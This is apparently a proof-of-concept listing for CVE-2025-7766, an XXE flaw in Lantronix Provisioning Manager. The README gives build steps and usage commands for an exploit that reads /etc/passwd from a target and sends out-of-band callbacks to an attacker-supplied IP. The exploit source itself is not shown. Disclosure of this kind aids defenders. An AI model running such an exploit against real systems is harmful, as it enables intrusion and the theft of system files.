CVE-2025-7766 PoC — Lantronix Provisioning Manager Improper Restriction of XML External Entity Reference

Source

Associated Vulnerability

Description

PoC exploit for CVE-2025-7766 – XXE vulnerability leading to potential RCE.

Readme

# CVE-2025-7766 PoC Exploit

PoC for exploiting XML External Entity vulnerability in CVE-2025-7766. Demonstrates file read (/etc/passwd) and out-of-band HTTP callbacks.

**Author**: Byte Reaper

**Telegram**: @ByteReaper0

**CVE**: CVE-2025-7766

**Vulnerability**: Remote Code Execution via XML External Entity (XXE)

---

## PoC for exploiting XXE in CVE-2025-7766. Demonstrates:

* Reading `/etc/passwd` from the target.
* Triggering out-of-band HTTP request to your server.

## Requirements

* gcc
* libcurl
* argparse library

## Build

```
gcc -o exploit exploit.c argparse.c -lcurl
```

## Usage

```
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v
```

## LICENSE:
MIT 

File Snapshot

 [4.0K]  /data/pocs/ead46940883ffb8e90102c6a8d9708df62accdb5
├── [ 14K]  exploit.c
├── [1.0K]  LICENSE
└── [1.1K]  README.md

0 directories, 3 files

Remarks